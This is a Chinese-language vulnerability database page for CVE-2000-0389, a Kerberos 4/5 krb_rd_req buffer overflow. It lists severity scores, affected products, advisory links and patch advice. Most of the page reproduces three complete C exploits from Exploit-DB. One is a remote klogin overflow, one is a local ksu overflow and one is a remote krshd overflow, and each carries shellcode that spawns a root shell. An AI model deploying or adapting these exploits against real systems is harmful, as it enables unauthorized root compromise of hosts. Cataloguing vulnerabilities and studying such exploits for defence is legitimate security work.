CVE-2000-0389
CVSS10.0
发布时间 :2000-05-16 00:00:00
修订时间 :2008-09-10 15:04:34
NMCOE    

[原文]Buffer overflow in krb_rd_req function in Kerberos 4 and 5 allows remote attackers to gain root privileges.


[CNNVD]多个厂商Kerberos 5/Kerberos 4 兼容问题的krb_rd_req()函数的缓冲区溢出漏洞(CNNVD-200005-057)

        Kerberos 4 and 5 的krb_rd_req函数存在缓冲区溢出漏洞,远程攻击者可以利用这个漏洞获取根权限。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:cygnus:cygnus_network_security:4.0
cpe:/o:redhat:linux:6.2::alpha
cpe:/a:mit:kerberos:5_1.1.1MIT Kerberos 5 1.1.1
cpe:/a:mit:kerberos:4.0MIT Kerberos 4 4.0
cpe:/o:redhat:linux:6.2::sparc
cpe:/o:redhat:linux:6.2::i386
cpe:/a:cygnus:kerbnet:5.0
cpe:/a:mit:kerberos:5_1.0MIT Kerberos 5 krb5_1.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0389
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0389
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200005-057
(官方数据源) CNNVD

- 其它链接及资源

http://www.cert.org/advisories/CA-2000-06.html
(VENDOR_ADVISORY)  CERT  CA-2000-06
http://www.securityfocus.com/bid/1220
(UNKNOWN)  BID  1220
http://www.redhat.com/support/errata/RHSA-2000-025.html
(UNKNOWN)  REDHAT  RHSA-2000:025
http://archives.neohapsis.com/archives/freebsd/2000-05/0295.html
(UNKNOWN)  FREEBSD  FreeBSD-SA-00:20
http://archives.neohapsis.com/archives/bugtraq/2000-05/0184.html
(UNKNOWN)  BUGTRAQ  20000516 BUFFER OVERRUN VULNERABILITIES IN KERBEROS

- 漏洞信息

多个厂商Kerberos 5/Kerberos 4 兼容问题的krb_rd_req()函数的缓冲区溢出漏洞
危急 缓冲区溢出
2000-05-16 00:00:00 2005-07-27 00:00:00
远程※本地  
        Kerberos 4 and 5 的krb_rd_req函数存在缓冲区溢出漏洞,远程攻击者可以利用这个漏洞获取根权限。

- 公告与补丁

        MIT will release krb5-1.2 shortly, which will remedy these problems in the MIT codebase. Patches are available against krb5-1.0.x., and krb5-1.1.1
        Users upgrading to krb5-1.1.1 and compiling with the --without-krb4 option also need to apply patches against the login program to prevent a dangling else clause.
        Removing the setuid bit on the v4rcp binary will eliminate that specific vulnerability under RedHat Linux 6.2. It will not remove additional problems present if Kerberos is installed.
        Any users still using FreeBSD 2.2.5 and who have installed the optional Kerberos distribution are urged to upgrade to 2.2.8-STABLE or later. Note however that FreeBSD 2.x is no longer an officially supported version, nor are security fixes always provided.
        RedHat has released patches. See the RedHat advisory
        http://www.redhat.com/support/errata/RHSA-2000-025.html
        MIT Kerberos 5 5.0 -1.0.x
        
        MIT Kerberos 5 5.0 -1.1.1
        

- 漏洞信息 (19924)

Cygnus Network Security 4.0/KerbNet 5.0,MIT Kerberos 4/5,RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (1) (EDBID:19924)
bsd remote
2000-05-16 Verified
0 duke
N/A [点击下载]
source: http://www.securityfocus.com/bid/1220/info


Several buffer overflow vulnerabilities exist in Kerberos 5 implmenetations due to buffer overflows in the Kerberos 4 compatability code. These include MIT Kerberos 5 releases 1.0.x, 1.1 and 1.1.1, MIT Kerberos 4 patch level 10 (and, most likely, prior releases), and Cygnus KerbNet and Network Security (CNS). The main source of problems is due to a buffer overflow in the krb_rd_req() library function. This function is used by every application that supports Kerberos 4 authentication, including, but not limited to, kshrd, klogin, telnetd, ftpd, rkinitd, v4rcp and kpopd. Therefore, it is possible for a remote attacker to exploit this vulnerability and gain root access on affected machines, or obtain root level access once local.

A setuid version of v4rcp is shipped with RedHat Linux 6.2, as part of a full install. It is possible to use this program, to obtain root level access.

In addition, there are other buffer overruns present in the ksu and krshd sources from MIT. These problems will be remedied in the same release from MIT that fixes the krrb_rd_req() vulnerability.

/*
  
    klogin remote buffer overflow
    by duke (duke@viper.net.au)  
    
    tested on BSDI 4.0.1 klogin.
    The bug is actually in the kerberos library so this
    affects all kerb services (kerbIV). This code should need
    minimal (if any) modification to use on other kerberos services.
    it will only work if the file /etc/kerberosIV/krb.conf exists.  
    
    -duke
    
*/  
    
#include <stdio.h>
#include <string.h>
#include <netdb.h> 
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h> 
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
    
#define RET 0x8047830
#define NOPLEN 900 
#define MAX(x, y) ((x > y) ? x : y)
    
char bsdi_shell[]=
"\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76"  
"\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07"
"\xff\xe8\xdc\xff\xff\xff/bin/sh\x00";
    
void usage(char *);
void shell(int);
char *make_data(void);

int offset=0;

int main(int argc, char **argv)
{
  int sockfd, port=543, c;
  char *pkt, buf[1024];
  struct sockaddr_in sin;
  struct hostent *hp;

  while((c = getopt(argc, argv, "p:o:")) != EOF){
    switch(c){ 
      case 'p': port = atoi(optarg); break;
      case 'o': offset = atoi(optarg); break;
      default: usage(argv[0]);
    }
  }
  if(!argv[optind])
    usage(argv[0]);
  if((hp = gethostbyname(argv[optind])) == NULL){
    fprintf(stderr, "can't resolve host\n");
    exit(-1);
  } 
  pkt = make_data();
  bzero(&sin, sizeof(sin));
  sin.sin_family = AF_INET;
  sin.sin_port = htons(port);
  sin.sin_addr = *((struct in_addr *)hp->h_addr_list[0]);
  if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) < 0){
    perror("socket");
    exit(-1);
  }
  if(connect(sockfd, (struct sockaddr *)&sin, sizeof(sin)) < 0){
    perror("connect"); 
    exit(-1);
  }   
  write(sockfd, pkt, 1221);
  free(pkt);
  shell(sockfd);
}   
  
void usage(char *p) 
{   
  fprintf(stderr, "usage: %s [ -p port ] [ -o offset ] <hostname>\n", p);
  fprintf(stderr, "-p: port to use\n");
  fprintf(stderr, "-o: offset\n");
  exit(0);
} 
  
char *make_data(void)
{   
  char *tmp, *ptr;
  int i;
  if((tmp=(char *)calloc(1250, sizeof(char))) == NULL){
    perror("calloc");  
    exit(-1);
  }   
  ptr = tmp;
  *ptr++ = 0x00;
  memcpy(ptr, "AUTHV0.1", 8);
  ptr+=8;
  for(i=0; i<8; i++)
    *ptr++ = 0x41;  
  *(unsigned long *)ptr = htonl(1200);
  ptr+=4;
  *(unsigned int *)ptr++ = 4;
  *ptr++ = 8;
  *ptr++ = 1;
  for(i=0; i < 600; i+=4)
    *(long *)&ptr[i] = RET + offset;
  memset(ptr+300, 0x90, NOPLEN);
  memcpy(ptr+800, bsdi_shell,
  sizeof(bsdi_shell));
  *(ptr+1000) = 0x00;
  return(tmp);
}   
    
void shell(int sock)
{ 
  fd_set rset;  
  char bu[1024];
  
  write(sock, "cd /; id; pwd; uname -a;\n", 25);
    
  FD_ZERO(&rset); 
  for(;;){
    FD_SET(fileno(stdin), &rset);
    FD_SET(sock, &rset);
    if(select(MAX(sock, fileno(stdin))+1, &rset, NULL, NULL, NULL) < 0){
      perror("select");  
      exit(-1);
    }
    if(FD_ISSET(sock, &rset)){
      char buf[1024]; 
      int n;
  
      bzero(buf, sizeof(buf));
      n = read(sock, buf, sizeof(buf)-1);
      if(n == 0){
        printf("EOF from server\n");
        exit(0);
      }
      if(n < 0){
        perror("read");
        exit(-1);
      } else {
        write(1, buf, n);
      }
    }
    
    if(FD_ISSET(fileno(stdin), &rset)){
      char buf[1024];
     
      bzero(buf, sizeof(buf));
      if(fgets(buf, sizeof(buf)-4, stdin) == NULL){
        printf("OK. Quitting\n");
        close(sock);
        exit(0); 
      } 
      strcat(buf, "\n");
      if(write(sock, buf, strlen(buf)) < 0){
        perror("write");
        exit(0);
      }
    }   
  }     
}     		

- 漏洞信息 (19925)

Cygnus Network Security 4.0/KerbNet 5.0,MIT Kerberos 4/5,RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (2) (EDBID:19925)
linux local
2000-05-26 Verified
0 Jim Paris
N/A [点击下载]
source: http://www.securityfocus.com/bid/1220/info
 
 
Several buffer overflow vulnerabilities exist in Kerberos 5 implmenetations due to buffer overflows in the Kerberos 4 compatability code. These include MIT Kerberos 5 releases 1.0.x, 1.1 and 1.1.1, MIT Kerberos 4 patch level 10 (and, most likely, prior releases), and Cygnus KerbNet and Network Security (CNS). The main source of problems is due to a buffer overflow in the krb_rd_req() library function. This function is used by every application that supports Kerberos 4 authentication, including, but not limited to, kshrd, klogin, telnetd, ftpd, rkinitd, v4rcp and kpopd. Therefore, it is possible for a remote attacker to exploit this vulnerability and gain root access on affected machines, or obtain root level access once local.
 
A setuid version of v4rcp is shipped with RedHat Linux 6.2, as part of a full install. It is possible to use this program, to obtain root level access.
 
In addition, there are other buffer overruns present in the ksu and krshd sources from MIT. These problems will be remedied in the same release from MIT that fixes the krrb_rd_req() vulnerability.

/********
 * ksux.c -- ksu exploit
 * written January 26, 2000
 * Jim Paris <jim@jtan.com>
 * 
 * This program exploits a vulnerability in the 'ksu' utility included
 * with the MIT Kerberos distribution.  Versions prior to 1.1.1 are   
 * vulnerable.
 * 
 * This exploit is for Linux/x86 with Kerberos version 1.0.  Exploits
 * for other operating systems and versions of Kerberos should also work.
 * 
 * Since krb5_parse_name will reject input with an @ or /, this shellcode
 * execs 'sh' instead of '/bin/sh'.  As a result, a copy of 'sh' must    
 * reside in the current directory for the exploit to work. 
 * 
 */
   
#include <stdlib.h>
#include <stdio.h> 

int get_esp(void) { __asm__("movl %esp,%eax"); }

char *shellcode="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x02\x89\x46"
                "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
                "\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xffsh"; 
                
#define         LEN 0x300
#define  RET_OFFSET 0x240
#define  JMP_OFFSET 0x240
#define CODE_OFFSET 0x100

int main(int argc, char *argv[])
{
  int esp=get_esp();
  int i,j; char b[LEN];
  
  memset(b,0x90,LEN);
  memcpy(b+CODE_OFFSET,shellcode,strlen(shellcode));
  *(int *)&b[RET_OFFSET]=esp+JMP_OFFSET;
  b[RET_OFFSET+4]=0;
  
  execlp("ksu","ksu","-n",b,NULL);
} 		

- 漏洞信息 (19926)

Cygnus Network Security 4.0/KerbNet 5.0,MIT Kerberos 4/5,RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (3) (EDBID:19926)
linux remote
2000-04-08 Verified
0 Jim Paris
N/A [点击下载]
source: http://www.securityfocus.com/bid/1220/info
  
  
Several buffer overflow vulnerabilities exist in Kerberos 5 implmenetations due to buffer overflows in the Kerberos 4 compatability code. These include MIT Kerberos 5 releases 1.0.x, 1.1 and 1.1.1, MIT Kerberos 4 patch level 10 (and, most likely, prior releases), and Cygnus KerbNet and Network Security (CNS). The main source of problems is due to a buffer overflow in the krb_rd_req() library function. This function is used by every application that supports Kerberos 4 authentication, including, but not limited to, kshrd, klogin, telnetd, ftpd, rkinitd, v4rcp and kpopd. Therefore, it is possible for a remote attacker to exploit this vulnerability and gain root access on affected machines, or obtain root level access once local.
  
A setuid version of v4rcp is shipped with RedHat Linux 6.2, as part of a full install. It is possible to use this program, to obtain root level access.
  
In addition, there are other buffer overruns present in the ksu and krshd sources from MIT. These problems will be remedied in the same release from MIT that fixes the krrb_rd_req() vulnerability.


/********
 * kshux.c -- krshd remote exploit
 * written April 8, 2000
 * Jim Paris <jim@jtan.com>
 * 
 * This program exploits a vulnerability in the 'krshd' daemon included
 * with the MIT Kerberos distribution.  All versions are apparently
 * vulnerable.
 *
 * This exploit is for Linux/x86 with Kerberos version 1.0, but you'll
 * probably need a fair bit of coaxing to get it to work.
 *
 * And yes, it's ugly.  I need to accept an incoming connection from the
 * remote server, handle the fact that the overflow goes through two
 * functions and a toupper(), make sure that certain overwritten pointers
 * on the remote host's stack are set to valid values so that a strlen
 * call in krb425_conv_principal() doesn't cause a segfault before we
 * return into the shellcode, adjust the offset depending on the remote
 * hostname to properly align things, etc etc.  As a result, you'll
 * probably have a hard time getting this to work -- it took a lot of
 * hacking and hardcoded numbers to get this to work against my test
 * systems.
 *
 */

#include <stdio.h>
#include <sys/types.h>
#include <netdb.h>
#include <time.h>
#include <netinet/in.h>

#define LEN 1200
#define OFFSET 0
#define ADDR 0xbfffd7a4

char *sc="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46"
         "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
         "\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

void get_incoming(int r) {
  int s, l=1; struct sockaddr_in sa, ra;
  bzero(&sa,sizeof(sa));
  sa.sin_family=AF_INET;
  sa.sin_addr.s_addr=htonl(INADDR_ANY);
  sa.sin_port=htons(16474);
  if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
    perror("socket"),exit(1);
  setsockopt(s,SOL_SOCKET,SO_REUSEADDR,&l,sizeof(l));
  if(bind(s,(struct sockaddr *)&sa,sizeof(sa))<0)
    perror("bind"),exit(1);
  if(listen(s,1)) 
    perror("listen"),exit(1);
  write(r,"16474",6);
  if(accept(s,&sa,&l)<0) 
    perror("accept"),exit(1);
}

int con_outgoing(char *h) {
  int s, i; struct sockaddr_in a; struct hostent *e;
  if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
    perror("socket"),exit(1);
  if((i=inet_addr(h))==INADDR_NONE) { 
    if((e=gethostbyname(h))==NULL)
      perror("gethostbyname"),exit(1);
    bcopy(e->h_addr,&i,sizeof(i)); }
  bzero(&a,sizeof(a));
  a.sin_family=AF_INET;
  a.sin_addr.s_addr=i;
  a.sin_port=htons(544);
  if(connect(s,(struct sockaddr *)&a,sizeof(a))<0)
    perror("connect"),exit(1);
  return s;
}

void bus(int s) {
  int i; fd_set r; char b[1024];
  for(;;) {
    FD_ZERO(&r); FD_SET(0,&r); FD_SET(s,&r);
    if((i=select(s+1,&r,NULL,NULL,NULL))==-1)
      perror("select"),exit(1);
    if(i==0) fprintf(stderr,"closed\n"),exit(0);
    if(FD_ISSET(s,&r)) {
      if((i=read(s,b,sizeof(b)))<1)
	fprintf(stderr,"closed\n"),exit(0);
      write(1,b,i); }
    if(FD_ISSET(0,&r)) {
      if((i=read(0,b,sizeof(b)))<1)
	fprintf(stderr,"closed\n"),exit(0);
      write(s,b,i); } }
}

void main(int ac, char *av[])
{
  int s, i, j, a=ADDR, o=OFFSET;
  int l, h;
  char b[LEN];

  if(ac<2) { 
    fprintf(stderr,"%s hostname [addr] [offset]\n",*av);
    exit(1);
  }
  a+=(ac>2)?atoi(av[2]):0;
  o+=(ac>3)?atoi(av[3]):(4-(strlen(av[1])%4));
  o%=4;
  if(o<0) o+=4;
  l=(ac>4)?atoi(av[4]):-10;
  h=(ac>5)?atoi(av[5]):10;
  fprintf(stderr,"addr=%p, offset=%d\n",a,o);

  if(isupper(((char *)&a)[0]) ||
     isupper(((char *)&a)[1]) ||
     isupper(((char *)&a)[2]) ||
     isupper(((char *)&a)[3]))
    fprintf(stderr,"error: addr contains uppercase\n"),exit(0);

  s=con_outgoing(av[1]);
  get_incoming(s);

  sprintf(&b[0],"AUTHV0.1blahblah");
  *(int *)(b+16)=htonl(LEN);
  b[20]=4; b[21]=7; b[22]=123;
  write(s,b,23);

  for(i=0;i<LEN-8-strlen(sc)-1;i++) b[i]=0x90;
  bcopy(sc,b+i,strlen(sc)+1);
  for(i=LEN-8;i<LEN;i++) b[i]=0x00;

  for(i=255+o+l*4;i<=255+o+h*4;i+=4) *(int *)(b+i)=(a-4);
  *(int *)(b+251+o)=a;

  write(s,b,LEN);

  bus(s);
}
















		

- 漏洞信息

1339
MIT Kerberos 4/5 krb_rd_req() Function Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-05-16 Unknow
Unknow Unknow

- 解决方案

Upgrade to Kerberos 5 version 1.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站